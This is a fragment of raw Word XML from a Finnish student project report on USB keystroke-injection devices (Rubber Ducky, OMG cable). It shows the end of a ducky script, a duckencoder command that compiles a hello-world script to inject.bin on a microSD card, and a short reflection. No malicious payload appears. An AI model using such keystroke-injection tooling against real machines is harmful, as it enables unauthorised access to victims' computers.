        <w:t>STRING exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFCC13" w14:textId="650282BE" w:rsidR="000D29D9" w:rsidRPr="008A03FA" w:rsidRDefault="008A03FA" w:rsidP="00E37948">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A03FA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C124E70" w14:textId="2890560F" w:rsidR="00562A7A" w:rsidRPr="00522B04" w:rsidRDefault="00522B04" w:rsidP="00E37948">
      <w:r w:rsidRPr="00522B04">
        <w:t>Käännetään scripti injection.bin ti</w:t>
      </w:r>
      <w:r>
        <w:t>edostoksi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27512DF9" w14:textId="152D869C" w:rsidR="00562A7A" w:rsidRDefault="00562A7A" w:rsidP="00E37948">
      <w:r w:rsidRPr="00562A7A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E91C3F3" wp14:editId="357DE1AA">
            <wp:extent cx="5292090" cy="5375275"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="542776367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6367" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, numero&#10;&#10;Kuvaus luotu automaattisesti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7E6E" w14:textId="12D37246" w:rsidR="00FB02C7" w:rsidRDefault="00FB02C7" w:rsidP="00E37948">
      <w:r w:rsidRPr="00FB02C7">
        <w:lastRenderedPageBreak/>
        <w:t>“java -jar ~/Downloads/duckencoder.jar -i ~/rubber-ducky/hello-world.txt -o /Volumes/NO\ NAME/inject.bin”</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB02C7">
        <w:t xml:space="preserve"> komennon avulla si</w:t>
      </w:r>
      <w:r>
        <w:t>irretään microsd kortille. Jonka jälkeen testataan toiminta ja kytketään microsd kortti paikalleen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D8BC7" w14:textId="77777777" w:rsidR="00522B04" w:rsidRDefault="00522B04" w:rsidP="00E37948"/>
    <w:p w14:paraId="67F350FC" w14:textId="3297AF29" w:rsidR="00522B04" w:rsidRDefault="00522B04" w:rsidP="00522B04">
      <w:pPr>
        <w:pStyle w:val="Otsikko1"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc185288625"/>
      <w:r>
        <w:t>Reflektio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="062ECC14" w14:textId="012CD3A7" w:rsidR="00522B04" w:rsidRPr="00522B04" w:rsidRDefault="00522B04" w:rsidP="00522B04">
      <w:r>
        <w:t>Projektin eri tehtävät olivat opettavaisia.</w:t>
      </w:r>
      <w:r w:rsidR="00F51752">
        <w:t xml:space="preserve"> Erityisen mielenkiintoisia olivat omg-kaapeli</w:t>
      </w:r>
      <w:r w:rsidR="00A0419F">
        <w:t xml:space="preserve">. Yllätyin miten vaarallinen </w:t>
      </w:r>
      <w:r w:rsidR="00AD37C2">
        <w:t>normaalilta</w:t>
      </w:r>
      <w:r w:rsidR="00A0419F">
        <w:t xml:space="preserve"> näyttävä</w:t>
      </w:r>
      <w:r w:rsidR="00AD37C2">
        <w:t xml:space="preserve"> usb-piuha</w:t>
      </w:r>
      <w:r w:rsidR="00A0419F">
        <w:t xml:space="preserve"> voikaan olla ja minkälaisia asioita se voikaan tehdä</w:t>
      </w:r>
      <w:r w:rsidR="00AD37C2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA4067">
        <w:t xml:space="preserve">Osaa tehtävistä en saanut tehtyä loppuun, vaikka yritin muilta kysyä apua. </w:t>
      </w:r>
      <w:r w:rsidR="00C10331">
        <w:t>Kokonaisuutena projekti oli opettavainen ja opin paljon uutta</w:t>
      </w:r>
      <w:r w:rsidR="0087084D">
        <w:t xml:space="preserve"> eri aiheista.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00522B04" w:rsidRPr="00522B04" w:rsidSect="00B963D9">
      <w:headerReference w:type="default" r:id="rId38"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1276" w:right="1134" w:bottom="709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B45D1" w14:textId="77777777" w:rsidR="00B64C25" w:rsidRDefault="00B64C25" w:rsidP="00473AB6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="34B6DA90" w14:textId="77777777" w:rsidR="00B64C25" w:rsidRDefault="00B64C25" w:rsidP="0047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DC58D" w14:textId="77777777" w:rsidR="00B64C25" w:rsidRDefault="00B64C25" w:rsidP="00473AB6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7223B641" w14:textId="77777777" w:rsidR="00B64C25" w:rsidRDefault="00B64C25" w:rsidP="0047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5553" w14:textId="77777777" w:rsidR="003D092A" w:rsidRDefault="003D092A">
    <w:pPr>
      <w:pStyle w:val="Yltunniste"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="68C7284B" w14:textId="77777777" w:rsidR="003D092A" w:rsidRDefault="003D092A" w:rsidP="00B036EC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DF03E" w14:textId="60D7BB6F" w:rsidR="003D092A" w:rsidRDefault="00627234">
    <w:pPr>
      <w:pStyle w:val="Yltunniste"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="004076B7">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>13</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="5C463B43" w14:textId="77777777" w:rsidR="003D092A" w:rsidRDefault="003D092A" w:rsidP="00B036EC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6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5CF0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34C6E048"/>
    <w:lvl w:ilvl="0" w:tplc="68A637D0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E5714"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F6AB0D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1288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1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8876611">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2057123090">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="144323677">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="947195813">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1698382498">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1205825249">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="207985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5573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418303">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1748456688">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1728722008">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1158038861">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="732043776">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1551989483">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1616909427">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1135101147">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1179663105">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="2134983911">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2097050239">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1637831056">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1626502616">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1493135923">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="919631401">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1824543378">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1567908702">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="603071943">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="481778209">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="713038433">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="184640755">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1300261190">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="923035205">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1223755595">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1223180506">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="241378506">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="542057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63"/>
    <w:rsid w:val="00000FDD"/>
    <w:rsid w:val="0000359E"/>
    <w:rsid w:val="00011991"/>
    <w:rsid w:val="000144BE"/>
    <w:rsid w:val="000161E3"/>
    <w:rsid w:val="000261B6"/>
    <w:rsid w:val="0002723D"/>
    <w:rsid w:val="00033A84"/>
    <w:rsid w:val="000401BA"/>
    <w:rsid w:val="000448A7"/>
    <w:rsid w:val="000515F0"/>
    <w:rsid w:val="00063094"/>
    <w:rsid w:val="00063268"/>
    <w:rsid w:val="0006574E"/>
    <w:rsid w:val="00071698"/>
    <w:rsid w:val="00077C16"/>
    <w:rsid w:val="00084600"/>
    <w:rsid w:val="00084F96"/>
    <w:rsid w:val="000916BC"/>
    <w:rsid w:val="00091F8F"/>
    <w:rsid w:val="00095B4C"/>
    <w:rsid w:val="00096E0E"/>
    <w:rsid w:val="000A19EC"/>
    <w:rsid w:val="000A3E2D"/>
    <w:rsid w:val="000A7C95"/>
    <w:rsid w:val="000B1110"/>
    <w:rsid w:val="000B1A8B"/>
    <w:rsid w:val="000B7A77"/>
    <w:rsid w:val="000C573E"/>
    <w:rsid w:val="000D29D9"/>
    <w:rsid w:val="000D6D61"/>
    <w:rsid w:val="000E3429"/>
    <w:rsid w:val="000E3EDC"/>
    <w:rsid w:val="000E677C"/>
    <w:rsid w:val="000F1068"/>
    <w:rsid w:val="000F2584"/>
    <w:rsid w:val="000F4FF3"/>
    <w:rsid w:val="000F7B43"/>
    <w:rsid w:val="000F7EA4"/>
    <w:rsid w:val="00100FE1"/>
    <w:rsid w:val="00111E67"/>
    <w:rsid w:val="00126CE5"/>
    <w:rsid w:val="001275A9"/>
    <w:rsid w:val="0013588E"/>
    <w:rsid w:val="00142310"/>
    <w:rsid w:val="0014635B"/>
    <w:rsid w:val="00146580"/>
    <w:rsid w:val="00152715"/>
    <w:rsid w:val="00155AA0"/>
    <w:rsid w:val="001567D0"/>
    <w:rsid w:val="00162BDB"/>
    <w:rsid w:val="00171C41"/>
    <w:rsid w:val="00172C82"/>
    <w:rsid w:val="00190487"/>
    <w:rsid w:val="001938A3"/>
    <w:rsid w:val="0019677B"/>
    <w:rsid w:val="0019713A"/>
    <w:rsid w:val="00197840"/>
    <w:rsid w:val="001A313E"/>
    <w:rsid w:val="001A3966"/>
    <w:rsid w:val="001A5706"/>
    <w:rsid w:val="001A6D67"/>
    <w:rsid w:val="001C5288"/>
    <w:rsid w:val="001C62F4"/>
    <w:rsid w:val="001D1485"/>
    <w:rsid w:val="001D2489"/>
    <w:rsid w:val="001D6F33"/>
    <w:rsid w:val="001E4478"/>
    <w:rsid w:val="001E4C57"/>
    <w:rsid w:val="001F00E3"/>
    <w:rsid w:val="001F0E52"/>
    <w:rsid w:val="0020046D"/>
    <w:rsid w:val="00203AB0"/>
    <w:rsid w:val="002045A3"/>
    <w:rsid w:val="00206810"/>
    <w:rsid w:val="0020740C"/>
    <w:rsid w:val="0021304A"/>
    <w:rsid w:val="00215C48"/>
    <w:rsid w:val="0021694C"/>
    <w:rsid w:val="00217EF7"/>
    <w:rsid w:val="00217FBB"/>
    <w:rsid w:val="002233E0"/>
    <w:rsid w:val="00235891"/>
    <w:rsid w:val="00235CA8"/>
    <w:rsid w:val="002407B2"/>
    <w:rsid w:val="0024127A"/>
    <w:rsid w:val="0024249E"/>
    <w:rsid w:val="00244376"/>
    <w:rsid w:val="00266D34"/>
    <w:rsid w:val="00275083"/>
    <w:rsid w:val="002769D9"/>
    <w:rsid w:val="00276EE3"/>
    <w:rsid w:val="00282244"/>
    <w:rsid w:val="00283F31"/>
    <w:rsid w:val="0028555E"/>
    <w:rsid w:val="002871B4"/>
    <w:rsid w:val="00292CAF"/>
    <w:rsid w:val="00296A4A"/>
    <w:rsid w:val="002B49BC"/>
    <w:rsid w:val="002B7F03"/>
    <w:rsid w:val="002C06F2"/>
    <w:rsid w:val="002C1A60"/>
    <w:rsid w:val="002C2F29"/>
    <w:rsid w:val="002C41B4"/>
    <w:rsid w:val="002C7D08"/>
    <w:rsid w:val="002D7858"/>
    <w:rsid w:val="002E1B90"/>
    <w:rsid w:val="002E1C42"/>
    <w:rsid w:val="00300864"/>
    <w:rsid w:val="00301FE8"/>
    <w:rsid w:val="00303477"/>
    <w:rsid w:val="0030765B"/>
    <w:rsid w:val="00310BC4"/>
    <w:rsid w:val="003125B0"/>
    <w:rsid w:val="00314AED"/>
    <w:rsid w:val="0033027C"/>
    <w:rsid w:val="0034249F"/>
    <w:rsid w:val="00352A7B"/>
    <w:rsid w:val="00356067"/>
    <w:rsid w:val="003561AD"/>
    <w:rsid w:val="00357E31"/>
    <w:rsid w:val="0036062E"/>
    <w:rsid w:val="00360FE6"/>
    <w:rsid w:val="00366DF5"/>
    <w:rsid w:val="00367EB3"/>
    <w:rsid w:val="003739CF"/>
    <w:rsid w:val="00384109"/>
    <w:rsid w:val="00386B10"/>
    <w:rsid w:val="003876FD"/>
    <w:rsid w:val="00391AAD"/>
    <w:rsid w:val="00396DBE"/>
    <w:rsid w:val="003A0382"/>
    <w:rsid w:val="003B24B4"/>
    <w:rsid w:val="003B45E1"/>
    <w:rsid w:val="003B5784"/>
    <w:rsid w:val="003D092A"/>
    <w:rsid w:val="003D2A94"/>
    <w:rsid w:val="003D6D51"/>
    <w:rsid w:val="003D7CC5"/>
    <w:rsid w:val="003E1172"/>
    <w:rsid w:val="003E56C3"/>
    <w:rsid w:val="003F26DB"/>
    <w:rsid w:val="003F388A"/>
    <w:rsid w:val="003F4FF7"/>
    <w:rsid w:val="00401CC6"/>
    <w:rsid w:val="004076B7"/>
    <w:rsid w:val="004136A4"/>
    <w:rsid w:val="00413ED8"/>
    <w:rsid w:val="0042432E"/>
    <w:rsid w:val="00426EE4"/>
    <w:rsid w:val="00430102"/>
    <w:rsid w:val="004363BF"/>
    <w:rsid w:val="00445030"/>
    <w:rsid w:val="00447659"/>
    <w:rsid w:val="00447836"/>
    <w:rsid w:val="00462076"/>
    <w:rsid w:val="00462A12"/>
    <w:rsid w:val="00467CD2"/>
    <w:rsid w:val="00471BA3"/>
    <w:rsid w:val="00473AB6"/>
    <w:rsid w:val="004746B5"/>
    <w:rsid w:val="0048205F"/>
    <w:rsid w:val="00483165"/>
    <w:rsid w:val="004873B0"/>
    <w:rsid w:val="00487586"/>
    <w:rsid w:val="00493B7C"/>
    <w:rsid w:val="00495886"/>
    <w:rsid w:val="004A066A"/>
    <w:rsid w:val="004A45E9"/>
    <w:rsid w:val="004A51A7"/>
    <w:rsid w:val="004C32A9"/>
    <w:rsid w:val="004D2B83"/>
    <w:rsid w:val="004D43C0"/>
    <w:rsid w:val="004D45BC"/>
    <w:rsid w:val="004D4F16"/>
    <w:rsid w:val="004E2596"/>
    <w:rsid w:val="004E5025"/>
    <w:rsid w:val="004E643F"/>
    <w:rsid w:val="004E6990"/>
    <w:rsid w:val="004F0BA7"/>
    <w:rsid w:val="004F171B"/>
    <w:rsid w:val="004F1830"/>
    <w:rsid w:val="004F3321"/>
    <w:rsid w:val="004F7BCE"/>
    <w:rsid w:val="005141CC"/>
    <w:rsid w:val="00516B65"/>
    <w:rsid w:val="00517727"/>
    <w:rsid w:val="00522B04"/>
    <w:rsid w:val="00530274"/>
    <w:rsid w:val="00535AEB"/>
    <w:rsid w:val="00541EC6"/>
    <w:rsid w:val="0054219E"/>
    <w:rsid w:val="00542BB2"/>
    <w:rsid w:val="0054432B"/>
    <w:rsid w:val="005445E9"/>
    <w:rsid w:val="00544B15"/>
    <w:rsid w:val="00547993"/>
    <w:rsid w:val="00547EA1"/>
    <w:rsid w:val="00550312"/>
    <w:rsid w:val="005538A8"/>
    <w:rsid w:val="00556321"/>
    <w:rsid w:val="00562A7A"/>
    <w:rsid w:val="00563445"/>
    <w:rsid w:val="005648F7"/>
    <w:rsid w:val="00567F2C"/>
    <w:rsid w:val="00571483"/>
    <w:rsid w:val="00571B68"/>
    <w:rsid w:val="005743FA"/>
    <w:rsid w:val="005745FA"/>
    <w:rsid w:val="005755D6"/>
    <w:rsid w:val="00577B5E"/>
    <w:rsid w:val="005808F2"/>
    <w:rsid w:val="00583CA8"/>
    <w:rsid w:val="00584BFD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342D"/>
    <w:rsid w:val="005B557B"/>
    <w:rsid w:val="005B5760"/>
    <w:rsid w:val="005C14DA"/>
    <w:rsid w:val="005C63BB"/>
    <w:rsid w:val="005C71A7"/>
    <w:rsid w:val="005E0781"/>
    <w:rsid w:val="005E1CDA"/>
    <w:rsid w:val="005E7ACE"/>
    <w:rsid w:val="005F45CC"/>
    <w:rsid w:val="005F584E"/>
    <w:rsid w:val="00607F60"/>
    <w:rsid w:val="006241E3"/>
    <w:rsid w:val="00625ABA"/>
    <w:rsid w:val="00627234"/>
    <w:rsid w:val="00635269"/>
    <w:rsid w:val="00641D29"/>
    <w:rsid w:val="00642D93"/>
    <w:rsid w:val="00644E50"/>
    <w:rsid w:val="0065315A"/>
    <w:rsid w:val="006545D9"/>
    <w:rsid w:val="00655F63"/>
    <w:rsid w:val="00662045"/>
    <w:rsid w:val="006642EE"/>
    <w:rsid w:val="00664B4D"/>
    <w:rsid w:val="00681E63"/>
    <w:rsid w:val="006823A1"/>
    <w:rsid w:val="00693050"/>
    <w:rsid w:val="00693907"/>
    <w:rsid w:val="00694024"/>
    <w:rsid w:val="006A0276"/>
    <w:rsid w:val="006A4C8F"/>
    <w:rsid w:val="006A74B6"/>
    <w:rsid w:val="006B662E"/>
    <w:rsid w:val="006C1525"/>
    <w:rsid w:val="006D0B6A"/>
    <w:rsid w:val="006D4C44"/>
    <w:rsid w:val="006D68D8"/>
    <w:rsid w:val="006D7838"/>
    <w:rsid w:val="006E3A1F"/>
    <w:rsid w:val="006E7EC3"/>
    <w:rsid w:val="006E7ED0"/>
    <w:rsid w:val="006F38C1"/>
    <w:rsid w:val="006F41AD"/>
    <w:rsid w:val="006F5409"/>
    <w:rsid w:val="00707593"/>
    <w:rsid w:val="00716EE4"/>
    <w:rsid w:val="00724861"/>
    <w:rsid w:val="00725432"/>
    <w:rsid w:val="00734A2D"/>
    <w:rsid w:val="00736513"/>
    <w:rsid w:val="007377B1"/>
    <w:rsid w:val="007402C2"/>
    <w:rsid w:val="00762499"/>
    <w:rsid w:val="00765D7E"/>
    <w:rsid w:val="007672CC"/>
    <w:rsid w:val="0077054E"/>
    <w:rsid w:val="0077488B"/>
    <w:rsid w:val="00776132"/>
    <w:rsid w:val="00780563"/>
    <w:rsid w:val="0078295A"/>
    <w:rsid w:val="00787A52"/>
    <w:rsid w:val="00790DFE"/>
    <w:rsid w:val="007A1B38"/>
    <w:rsid w:val="007A2CD5"/>
    <w:rsid w:val="007A492E"/>
    <w:rsid w:val="007B6162"/>
    <w:rsid w:val="007B758D"/>
    <w:rsid w:val="007C436D"/>
    <w:rsid w:val="007D2D10"/>
    <w:rsid w:val="007E1416"/>
    <w:rsid w:val="007E22E6"/>
    <w:rsid w:val="007E74E1"/>
    <w:rsid w:val="007E7969"/>
    <w:rsid w:val="007F1701"/>
    <w:rsid w:val="007F1FF7"/>
    <w:rsid w:val="007F615C"/>
    <w:rsid w:val="007F7FC2"/>
    <w:rsid w:val="0080463E"/>
    <w:rsid w:val="00804BE5"/>
    <w:rsid w:val="00817637"/>
    <w:rsid w:val="00823BC1"/>
    <w:rsid w:val="00830F72"/>
    <w:rsid w:val="00831DF5"/>
    <w:rsid w:val="008547C4"/>
    <w:rsid w:val="00860C57"/>
    <w:rsid w:val="00861A87"/>
    <w:rsid w:val="00862514"/>
    <w:rsid w:val="00865FB0"/>
    <w:rsid w:val="0087084D"/>
    <w:rsid w:val="0087096F"/>
    <w:rsid w:val="008715E4"/>
    <w:rsid w:val="00873EFF"/>
    <w:rsid w:val="00875EFD"/>
    <w:rsid w:val="00882F20"/>
    <w:rsid w:val="00885B51"/>
    <w:rsid w:val="008976D0"/>
    <w:rsid w:val="008A03FA"/>
    <w:rsid w:val="008A1CCE"/>
    <w:rsid w:val="008A495F"/>
    <w:rsid w:val="008A57FF"/>
    <w:rsid w:val="008A5BB0"/>
    <w:rsid w:val="008A7356"/>
    <w:rsid w:val="008A7A08"/>
    <w:rsid w:val="008B41BC"/>
    <w:rsid w:val="008B6F0B"/>
    <w:rsid w:val="008C3CC6"/>
    <w:rsid w:val="008C4068"/>
    <w:rsid w:val="008C42B9"/>
    <w:rsid w:val="008C44DC"/>
    <w:rsid w:val="008D6495"/>
    <w:rsid w:val="008D6BA8"/>
    <w:rsid w:val="008D7B96"/>
    <w:rsid w:val="008E435A"/>
    <w:rsid w:val="008E47C5"/>
    <w:rsid w:val="008F15ED"/>
    <w:rsid w:val="008F6D9E"/>
    <w:rsid w:val="00902FEE"/>
    <w:rsid w:val="009075A0"/>
    <w:rsid w:val="00914EDF"/>
    <w:rsid w:val="00924DE9"/>
    <w:rsid w:val="00925432"/>
    <w:rsid w:val="009269CE"/>
    <w:rsid w:val="00926C05"/>
    <w:rsid w:val="00931637"/>
    <w:rsid w:val="00933A25"/>
    <w:rsid w:val="00935C83"/>
    <w:rsid w:val="00937C79"/>
    <w:rsid w:val="00940F83"/>
    <w:rsid w:val="0094202A"/>
    <w:rsid w:val="00956732"/>
    <w:rsid w:val="00965402"/>
    <w:rsid w:val="00983EBE"/>
    <w:rsid w:val="00990141"/>
    <w:rsid w:val="00995F4C"/>
    <w:rsid w:val="009A1908"/>
    <w:rsid w:val="009A314B"/>
    <w:rsid w:val="009A6C05"/>
    <w:rsid w:val="009B6599"/>
    <w:rsid w:val="009C1F9B"/>
    <w:rsid w:val="009C40E2"/>
    <w:rsid w:val="009C531F"/>
    <w:rsid w:val="009D05E0"/>
    <w:rsid w:val="009D1959"/>
    <w:rsid w:val="009E47DF"/>
    <w:rsid w:val="009F12E9"/>
    <w:rsid w:val="009F1D60"/>
    <w:rsid w:val="00A0162A"/>
    <w:rsid w:val="00A0419F"/>
    <w:rsid w:val="00A107AD"/>
    <w:rsid w:val="00A125C7"/>
    <w:rsid w:val="00A155DF"/>
    <w:rsid w:val="00A175C1"/>
    <w:rsid w:val="00A2572E"/>
    <w:rsid w:val="00A26263"/>
    <w:rsid w:val="00A2720C"/>
    <w:rsid w:val="00A27C0D"/>
    <w:rsid w:val="00A30A6D"/>
    <w:rsid w:val="00A31496"/>
    <w:rsid w:val="00A43026"/>
    <w:rsid w:val="00A54751"/>
    <w:rsid w:val="00A54D8B"/>
    <w:rsid w:val="00A555E9"/>
    <w:rsid w:val="00A73FE7"/>
    <w:rsid w:val="00A749D7"/>
    <w:rsid w:val="00A76010"/>
    <w:rsid w:val="00A7617A"/>
    <w:rsid w:val="00A770BA"/>
    <w:rsid w:val="00A86655"/>
    <w:rsid w:val="00A91B8D"/>
    <w:rsid w:val="00A95F15"/>
    <w:rsid w:val="00AA68D7"/>
    <w:rsid w:val="00AA7954"/>
    <w:rsid w:val="00AB1A77"/>
    <w:rsid w:val="00AB328A"/>
    <w:rsid w:val="00AB3A46"/>
    <w:rsid w:val="00AC432B"/>
    <w:rsid w:val="00AD0439"/>
    <w:rsid w:val="00AD37C2"/>
    <w:rsid w:val="00AE5C3C"/>
    <w:rsid w:val="00AE78E6"/>
    <w:rsid w:val="00AF3D10"/>
    <w:rsid w:val="00AF786B"/>
    <w:rsid w:val="00B01AB1"/>
    <w:rsid w:val="00B036EC"/>
    <w:rsid w:val="00B04306"/>
    <w:rsid w:val="00B0743F"/>
    <w:rsid w:val="00B226CC"/>
    <w:rsid w:val="00B230A0"/>
    <w:rsid w:val="00B23D0B"/>
    <w:rsid w:val="00B31B6D"/>
    <w:rsid w:val="00B34BF8"/>
    <w:rsid w:val="00B4233B"/>
    <w:rsid w:val="00B43C33"/>
    <w:rsid w:val="00B4527C"/>
    <w:rsid w:val="00B546D8"/>
    <w:rsid w:val="00B572C2"/>
    <w:rsid w:val="00B63C6A"/>
    <w:rsid w:val="00B6408C"/>
    <w:rsid w:val="00B64C25"/>
    <w:rsid w:val="00B70D1B"/>
    <w:rsid w:val="00B86AD5"/>
    <w:rsid w:val="00B91BEA"/>
    <w:rsid w:val="00B94F3B"/>
    <w:rsid w:val="00B963D9"/>
    <w:rsid w:val="00BA0214"/>
    <w:rsid w:val="00BA3043"/>
    <w:rsid w:val="00BA68FA"/>
    <w:rsid w:val="00BB14BA"/>
    <w:rsid w:val="00BB1965"/>
    <w:rsid w:val="00BB20DB"/>
    <w:rsid w:val="00BB37AC"/>
    <w:rsid w:val="00BB52A2"/>
    <w:rsid w:val="00BC3951"/>
    <w:rsid w:val="00BD01EA"/>
    <w:rsid w:val="00BD4BC3"/>
    <w:rsid w:val="00BE2CA5"/>
    <w:rsid w:val="00BE61E6"/>
    <w:rsid w:val="00BF07AB"/>
    <w:rsid w:val="00BF38C9"/>
    <w:rsid w:val="00BF6EEF"/>
    <w:rsid w:val="00C079F6"/>
    <w:rsid w:val="00C07A0B"/>
    <w:rsid w:val="00C100EE"/>
    <w:rsid w:val="00C10331"/>
    <w:rsid w:val="00C10E79"/>
    <w:rsid w:val="00C13998"/>
    <w:rsid w:val="00C13A39"/>
    <w:rsid w:val="00C158AF"/>
    <w:rsid w:val="00C158DD"/>
    <w:rsid w:val="00C265D8"/>
    <w:rsid w:val="00C35B0F"/>
    <w:rsid w:val="00C41479"/>
    <w:rsid w:val="00C43C29"/>
    <w:rsid w:val="00C4623D"/>
    <w:rsid w:val="00C462F5"/>
    <w:rsid w:val="00C50024"/>
    <w:rsid w:val="00C60BF8"/>
    <w:rsid w:val="00C63BAD"/>
    <w:rsid w:val="00C664AC"/>
    <w:rsid w:val="00C71093"/>
    <w:rsid w:val="00C721FF"/>
    <w:rsid w:val="00C73627"/>
    <w:rsid w:val="00C73BA4"/>
    <w:rsid w:val="00C749F0"/>
    <w:rsid w:val="00C84EEC"/>
    <w:rsid w:val="00C9065D"/>
    <w:rsid w:val="00C91524"/>
    <w:rsid w:val="00C91957"/>
    <w:rsid w:val="00C9470C"/>
    <w:rsid w:val="00C97762"/>
    <w:rsid w:val="00CA0D19"/>
    <w:rsid w:val="00CA2E6E"/>
    <w:rsid w:val="00CB102C"/>
    <w:rsid w:val="00CB3590"/>
    <w:rsid w:val="00CB586F"/>
    <w:rsid w:val="00CB5DC7"/>
    <w:rsid w:val="00CB5FB3"/>
    <w:rsid w:val="00CC0074"/>
    <w:rsid w:val="00CC26E2"/>
    <w:rsid w:val="00CC3C1B"/>
    <w:rsid w:val="00CC4CE3"/>
    <w:rsid w:val="00CC7311"/>
    <w:rsid w:val="00CC7B7A"/>
    <w:rsid w:val="00CE2780"/>
    <w:rsid w:val="00CE3204"/>
    <w:rsid w:val="00CE7D3C"/>
    <w:rsid w:val="00CF0320"/>
    <w:rsid w:val="00CF4962"/>
    <w:rsid w:val="00CF4DA7"/>
    <w:rsid w:val="00D05628"/>
    <w:rsid w:val="00D10515"/>
    <w:rsid w:val="00D13274"/>
    <w:rsid w:val="00D15EBA"/>
    <w:rsid w:val="00D221A6"/>
    <w:rsid w:val="00D2498A"/>
    <w:rsid w:val="00D30265"/>
    <w:rsid w:val="00D30C05"/>
    <w:rsid w:val="00D30F67"/>
    <w:rsid w:val="00D34307"/>
    <w:rsid w:val="00D368F7"/>
    <w:rsid w:val="00D37223"/>
    <w:rsid w:val="00D40A8E"/>
    <w:rsid w:val="00D438AC"/>
    <w:rsid w:val="00D43A3A"/>
    <w:rsid w:val="00D51247"/>
    <w:rsid w:val="00D706C4"/>
    <w:rsid w:val="00D75F6B"/>
    <w:rsid w:val="00D75F84"/>
    <w:rsid w:val="00D771A6"/>
